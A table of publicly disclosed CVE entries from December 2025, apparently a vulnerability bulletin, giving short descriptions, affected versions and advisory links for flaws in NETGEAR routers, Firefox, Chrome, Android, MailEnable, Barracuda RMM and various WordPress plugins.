| NETGEAR--C6220 | Denial of Service Vulnerability in NETGEAR C6220 and C6230 (DOCSIS® 3.0 Two-in-one Cable Modem + WiFi Router) allows authenticated local WiFi users reboot the router. | 2025-12-09 | not yet calculated | CVE-2025-12941 | https://www.netgear.com/support/product/c6220/ https://www.netgear.com/support/product/c6230/ https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| NETGEAR--R7000P | A vulnerability in NETGEAR Nighthawk R7000P routers lets an authenticated admin execute OS command injections due to improper input validation. This issue affects R7000P: through 1.3.3.154. | 2025-12-09 | not yet calculated | CVE-2025-12945 | https://www.netgear.com/support/product/r7000p https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| NETGEAR--RS700 | A vulnerability in the speedtest feature of affected NETGEAR Nighthawk routers, caused by improper input validation, can allow attackers on the router's WAN side, using attacker-in-the-middle techniques (MiTM) to manipulate DNS responses and execute commands when speedtests are run. This issue affects RS700: through 1.0.7.82; RAX54Sv2 : before V1.1.6.36; RAX41v2: before V1.1.6.36; RAX50: before V1.2.14.114; RAXE500: before V1.2.14.114; RAX41: before V1.0.17.142; RAX43: before V1.0.17.142; RAX35v2: before V1.0.17.142; RAXE450: before V1.2.14.114; RAX43v2: before V1.1.6.36; RAX42: before V1.0.17.142; RAX45: before V1.0.17.142; RAX50v2: before V1.1.6.36; MR90: before V1.0.2.46; MS90: before V1.0.2.46; RAX42v2: before V1.1.6.36; RAX49S: before V1.1.6.36. | 2025-12-09 | not yet calculated | CVE-2025-12946 | https://www.netgear.com/support/product/rs700 https://www.netgear.com/support/product/rax54sv2 https://www.netgear.com/support/product/rax41v2 https://www.netgear.com/support/product/RAX50 https://www.netgear.com/support/product/raxe500 https://www.netgear.com/support/product/rax41 https://www.netgear.com/support/product/rax43 https://www.netgear.com/support/product/rax35v2 https://www.netgear.com/support/product/raxe450 https://www.netgear.com/support/product/rax43v2 https://www.netgear.com/support/product/rax42 https://www.netgear.com/support/product/rax45 https://www.netgear.com/support/product/rax50v2 https://www.netgear.com/support/product/mr90 https://www.netgear.com/support/product/ms90 https://www.netgear.com/support/product/rax42v2 https://www.netgear.com/support/product/rax49s https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory |
| Google Cloud--Dialogflow CX | A privilege escalation vulnerability exists in Google Cloud's Dialogflow CX. Dialogflow agent developers with Webhook editor permission are able to configure Webhooks using Dialogflow service agent access token authentication. This allows the attacker to escalate their privileges from agent-level to project-level, granting them unauthorized access to manage resources in services associated with the project, leading to unexpected costs and resource depletion for the producer project. A fix was applied on the server side to protect from this vulnerability in February 2025. No customer action is required. | 2025-12-10 | not yet calculated | CVE-2025-12952 | https://docs.cloud.google.com/dialogflow/docs/release-notes#June_12_2025 |
| Unknown--WPeMatico RSS Feed Fetcher | The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks | 2025-12-09 | not yet calculated | CVE-2025-13031 | https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/ |
| ASUSTOR--ADM | When the user set the Notification's sender to send emails to the SMTP server via msmtp, an improper validated TLS/SSL certificates allows an attacker who can intercept network traffic between the SMTP client and server to execute a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the SMTP. Affected products and versions include: from ADM 4.1.0 through ADM 4.3.3.RKD2 as well as from ADM 5.0.0 through ADM 5.1.0.RN42. | 2025-12-12 | not yet calculated | CVE-2025-13052 | https://www.asustor.com/security/security_advisory_detail?id=49 |
| ASUSTOR--ADM | When a user configures the NAS to retrieve UPS status or control the UPS, a non-enforced TLS certificate verification can allow an attacker able to intercept network traffic between the client and server can perform a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the UPS server configuation. This issue affects ADM: from 4.1.0 through 4.3.3.RKD2, from 5.0.0 through 5.1.0.RN42. | 2025-12-12 | not yet calculated | CVE-2025-13053 | https://www.asustor.com/security/security_advisory_detail?id=49 |
| Unknown--CSV to SortTable | The CSV to SortTable WordPress plugin through 4.2 does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as contributor to perform LFI attacks. | 2025-12-09 | not yet calculated | CVE-2025-13070 | https://wpscan.com/vulnerability/deb52d69-d7f8-43a5-a709-1f543fd343c6/ |
| Unknown--Custom Admin Menu | The Custom Admin Menu WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-09 | not yet calculated | CVE-2025-13071 | https://wpscan.com/vulnerability/83c47c58-0395-4224-beaa-2f64ed92ef16/ |
| Unknown--HandL UTM Grabber / Tracker | The HandL UTM Grabber / Tracker WordPress plugin before 2.8.1 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-10 | not yet calculated | CVE-2025-13072 | https://wpscan.com/vulnerability/e3795f29-b886-4b92-a7d6-5f5afd7090aa/ |
| Unknown--HandL UTM Grabber / Tracker | The HandL UTM Grabber / Tracker WordPress plugin before 2.8.1 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-12-10 | not yet calculated | CVE-2025-13073 | https://wpscan.com/vulnerability/697fc4be-782c-44cc-840a-774c8ab3ccd8/ |
| Toto Link--X5000R's (AX1800 router) | Unauthenticated Telnet enablement via cstecgi.cgi (auth bypass) leading to unauthenticated root login with a blank password on factory/reset X5000R V9.1.0u.6369_B20230113 (arbitrary command execution). Earlier versions that share the same implementation, may also be affected. | 2025-12-10 | not yet calculated | CVE-2025-13184 | https://hackingbydoing.wixsite.com/hackingbydoing/post/totolink-x5000r-ax1800-router-authentication-bypass |
| Google Cloud--Google Cloud SecOps SOAR | A vulnerability exists in the SecOps SOAR server. The custom integrations feature allowed an authenticated user with an "IDE role" to achieve Remote Code Execution (RCE) in the server. The flaw stemmed from weak validation of uploaded Python package code. An attacker could upload a package containing a malicious setup.py file, which would execute on the server during the installation process, leading to potential server compromise. No customer action is required. All customers have been automatically upgraded to the fixed version: 6.3.64 or higher. | 2025-12-09 | not yet calculated | CVE-2025-13428 | https://cloud.google.com/support/bulletins#gcp-2025-075 |
| Dr.Buho--BuhoNTFS | BuhoNTFS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via insecure functions. This issue affects BuhoNTFS: 1.3.2. | 2025-12-12 | not yet calculated | CVE-2025-13733 | https://fluidattacks.com/advisories/greenday https://www.drbuho.com/buhontfs |
| Docker--Docker Desktop | Docker Desktop diagnostics bundles were found to include expired Hub PATs in log output due to error object serialization. This poses a risk of leaking sensitive information in exported diagnostics, especially when access denied errors occurred. | 2025-12-09 | not yet calculated | CVE-2025-13743 | https://docs.docker.com/desktop/troubleshoot-and-support/troubleshoot/#troubleshoot-menu |
| wolfSSL--wolfSSL | Multiple constant-time implementations in wolfSSL before version 5.8.4 may be transformed into non-constant-time binary by LLVM optimizations, which can potentially result in observable timing discrepancies and lead to information disclosure through timing side-channel attacks. | 2025-12-11 | not yet calculated | CVE-2025-13912 | https://github.com/wolfSSL/wolfssl/pull/9148 |
| GTT--Sistema de Informacin Tributario | Bypass vulnerability in the authentication method in the GTT Tax Information System application, related to the Active Directory (LDAP) login method. Authentication is performed through a local WebSocket, but the web application does not properly validate the authenticity or origin of the data received, allowing an attacker with access to the local machine or internal network to impersonate the legitimate WebSocket and inject manipulated information. Exploiting this vulnerability could allow an attacker to authenticate as any user in the domain, without the need for valid credentials, compromising the confidentiality, integrity, and availability of the application and its data. | 2025-12-10 | not yet calculated | CVE-2025-13953 | https://www.incibe.es/en/incibe-cert/notices/aviso/bypass-authentication-method-gtt-sistema-de-informacion-tributario |
| EZCast--EZCast Pro II | Hard-coded cryptographic keys in Admin UI of EZCast Pro II version 1.17478.146 allows attackers to bypass authorization checks and gain full access to the admin UI | 2025-12-10 | not yet calculated | CVE-2025-13954 | https://www.ncsc.admin.ch/ncsc/en/home/infos-fuer/infos-it-spezialisten/themen/schwachstelle-melden/cvd-cases/cvd-case-1-test.html |
| EZCast--EZCast Pro II | Predictable default Wi-Fi Password in Access Point functionality in EZCast Pro II version 1.17478.146 allows attackers in Wi-Fi range to gain access to the dongle by calculating the default password from observable device identifiers | 2025-12-10 | not yet calculated | CVE-2025-13955 | https://www.ncsc.admin.ch/ncsc/en/home/infos-fuer/infos-it-spezialisten/themen/schwachstelle-melden/cvd-cases/cvd-case-1-test.html |
| GitHub--Enterprise Server | An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed user-supplied HTML to inject DOM elements with IDs that collided with server-initialized data islands. These collisions could overwrite or shadow critical application state objects used by certain Project views, leading to unintended server-side POST requests or other unauthorized backend interactions. Successful exploitation requires an attacker to have access to the target GitHub Enterprise Server instance and to entice a privileged user to view crafted malicious content that includes conflicting HTML elements. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18.3, 3.17.9, 3.16.12, 3.15.16, and 3.14.21. | 2025-12-11 | not yet calculated | CVE-2025-14046 | https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.3 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.9 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.12 https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.16 https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.21 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499.110 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2025-12-12 | not yet calculated | CVE-2025-14174 | |
| KNIME--KNIME Business Hub | A wrong permission check in KNIME Business Hub before version 1.17.0 allowed an authenticated user to save jobs of other users as if there were saved by the job owner. The attacker must have permissions to access the jobs but then they were saved into the catalog service using the wrong owner permissions. Therefore it may have been possible to save into spaces where the attacker does not have write permissions. There is no workaround. | 2025-12-08 | not yet calculated | CVE-2025-14262 | https://www.knime.com/security/advisories#CVE-2025-11239 |
| Robocode Project--Robocode | A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/ | 2025-12-09 | not yet calculated | CVE-2025-14306 | https://github.com/robo-code/robocode/pull/67 |
| Robocode Project--Robocode | An insecure temporary file creation vulnerability exists in the AutoExtract component of Robocode version 1.9.3.6. The createTempFile method fails to securely create temporary files, allowing attackers to exploit race conditions and potentially execute arbitrary code or overwrite critical files. This vulnerability can be exploited by manipulating the temporary file creation process, leading to potential unauthorized actions. | 2025-12-09 | not yet calculated | CVE-2025-14307 | https://github.com/robo-code/robocode/pull/68 |
| Robocode Project--Robocode | An integer overflow vulnerability exists in the write method of the Buffer class in Robocode version 1.9.3.6. The method fails to properly validate the length of data being written, allowing attackers to cause an overflow, potentially leading to buffer overflows and arbitrary code execution. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the data length, leading to potential unauthorized code execution. | 2025-12-09 | not yet calculated | CVE-2025-14308 | https://github.com/robo-code/robocode/pull/70 |
| rethinkdb--rethinkdb | Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in rethinkdb. This issue affects rethinkdb: before 2.4.4. | 2025-12-09 | not yet calculated | CVE-2025-14310 | https://github.com/rethinkdb/rethinkdb/pull/7163 |
| JMRI--JMRI | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in JMRI. This issue affects JMRI: before 5.13.3. | 2025-12-09 | not yet calculated | CVE-2025-14311 | https://github.com/JMRI/JMRI/pull/14340 |
| Mozilla--Firefox | Use-after-free in the WebRTC: Signaling component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14321 | https://bugzilla.mozilla.org/show_bug.cgi?id=1992760 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics: CanvasWebGL component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14322 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996473 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Privilege escalation in the DOM: Notifications component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14323 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996555 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14324 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996840 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14325 | https://bugzilla.mozilla.org/show_bug.cgi?id=1998050 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Use-after-free in the Audio/Video: GMP component. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14326 | https://bugzilla.mozilla.org/show_bug.cgi?id=1840666 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Spoofing issue in the Downloads Panel component. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14327 | https://bugzilla.mozilla.org/show_bug.cgi?id=1970743 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Privilege escalation in the Netmonitor component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14328 | https://bugzilla.mozilla.org/show_bug.cgi?id=1996761 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Privilege escalation in the Netmonitor component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14329 | https://bugzilla.mozilla.org/show_bug.cgi?id=1997018 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14330 | https://bugzilla.mozilla.org/show_bug.cgi?id=1997503 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Same-origin policy bypass in the Request Handling component. This vulnerability affects Firefox < 146, Firefox ESR < 115.31, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14331 | https://bugzilla.mozilla.org/show_bug.cgi?id=2000218 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-93/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146 and Thunderbird < 146. | 2025-12-09 | not yet calculated | CVE-2025-14332 | Memory safety bugs fixed in Firefox 146 and Thunderbird 146 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-95/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox ESR 140.5, Thunderbird ESR 140.5, Firefox 145 and Thunderbird 145. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146, Firefox ESR < 140.6, Thunderbird < 146, and Thunderbird < 140.6. | 2025-12-09 | not yet calculated | CVE-2025-14333 | Memory safety bugs fixed in Firefox ESR 140.6, Thunderbird ESR 140.6, Firefox 146 and Thunderbird 146 https://www.mozilla.org/security/advisories/mfsa2025-92/ https://www.mozilla.org/security/advisories/mfsa2025-94/ https://www.mozilla.org/security/advisories/mfsa2025-95/ https://www.mozilla.org/security/advisories/mfsa2025-96/ |
| Google--Chrome | Use after free in Password Manager in Google Chrome prior to 143.0.7499.110 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-12 | not yet calculated | CVE-2025-14372 | |
| Google--Chrome | Inappropriate implementation in Toolbar in Google Chrome on Android prior to 143.0.7499.110 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-12 | not yet calculated | CVE-2025-14373 | |
| Gladinet--CentreStack and TrioFox | Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise. | 2025-12-12 | not yet calculated | CVE-2025-14611 | https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability |
| Google--Android | In multiple locations, there is a possible way to leak audio files across user profiles due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-22420 | https://android.googlesource.com/platform/frameworks/base/+/fb8f76eca9079c34af3e14ee0a58bc10a580ec42 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In notifyTimeout of CallRedirectionProcessor.java, there is a possible persistent connection due to improper input validation. This could lead to local escalation of privilege and background activity launches with User execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-22432 | https://android.googlesource.com/platform/packages/services/Telecomm/+/a43a880beaa6a64348a1d0c821e8c7e98d741a79 https://source.android.com/security/bulletin/2025-12-01 |
| TianoCore--EDK2 | EDK2 contains a vulnerability in BIOS where an attacker may cause " Improper Input Validation" by local access. Successful exploitation of this vulnerability could alter control flow in unexpected ways, potentially allowing arbitrary command execution and impacting Confidentiality, Integrity, and Availability. | 2025-12-09 | not yet calculated | CVE-2025-2296 | https://github.com/tianocore/edk2/security/advisories/GHSA-6pp6-cm5h-86g5 |
| Apache Software Foundation--Apache Fineract | Weak Password Requirements vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-23408 | https://lists.apache.org/thread/bdlb6wl968yh1n48mr5npsk2spo6dncf |
| Apache Software Foundation--Apache HugeGraph-Server | A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-26866 | https://github.com/apache/incubator-hugegraph/pull/2735 https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq |
| Google--Android | In ensureBound of RemotePrintService.java, there is a possible way for a background app to keep foreground permissions due to a permissions bypass. This could lead to local escalation of privilege with user execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32319 | https://android.googlesource.com/platform/frameworks/base/+/70ab82c4546aa893682a4507664dc2c471d6cd95 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of Session.java, there is a possible way to view images belonging to a different user of the device due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32328 | https://android.googlesource.com/platform/frameworks/base/+/e030442861f4dd0e03d67b65f0940b488007f0d7 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of Session.java, there is a possible way to view images belonging to a different user of the device due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32329 | https://android.googlesource.com/platform/frameworks/base/+/e030442861f4dd0e03d67b65f0940b488007f0d7 https://source.android.com/security/bulletin/2025-12-01 |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not verify the URL defined in an attacker-controlled WSDL that is later loaded by the application. This can lead to arbitrary file write and remote code execution via webshell upload. | 2025-12-10 | not yet calculated | CVE-2025-34392 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-absolute-path-traversal-rce https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/ |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not correctly verify the name of an attacker-controlled WSDL service, leading to insecure reflection. This can result in remote code execution through either invocation of arbitrary methods or deserialization of untrusted types. | 2025-12-10 | not yet calculated | CVE-2025-34393 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-insecure-reflection-rce |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, exposes a .NET Remoting service that is insufficiently protected against deserialization of arbitrary types. This can lead to remote code execution. | 2025-12-10 | not yet calculated | CVE-2025-34394 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-net-remoting-deserialization-rce |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, exposes a .NET Remoting service in which an unauthenticated attacker can invoke a method vulnerable to path traversal to read arbitrary files. This vulnerability can be escalated to remote code execution by retrieving the .NET machine keys. | 2025-12-10 | not yet calculated | CVE-2025-34395 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-net-remoting-path-traversal-rce |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAINFY.DLL from its application directo without sufficient integrity validation or secure search order. If the DLL is missing or attacker-writable locations in the search path are used, a local attacker with write permissions to the directory can plant a malicious MEAINFY.DLL. When the executable is launched, it loads the attacker-controlled library and executes code with the privileges of the process, enabling local privilege escalation when run with elevated rights. | 2025-12-09 | not yet calculated | CVE-2025-34396 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meainfy-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Message parameter of /Mobile/Compose.aspx. The Message value is not properly sanitized when processed via a GET request and is reflected into a JavaScript context in the response. By supplying a crafted payload that terminates the existing script block/function, injects attacker-controlled JavaScript, and comments out the remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim opens the crafted reply URL. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34397 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-message-parameter-of-mobile-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesBcc value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the JavaScript variable var sAddrBcc. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34398 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressesbcc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesCc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesCc value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the JavaScript variable var sAddrCc. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34399 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressescc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesTo parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesTo value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the response. By supplying a crafted payload that terminates the existing JavaScript function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34400 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressesto-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldBcc value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var BCCFieldProvided. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser during normal email composition. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34401 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldbcc-parameter-of-addressbook-aspx |
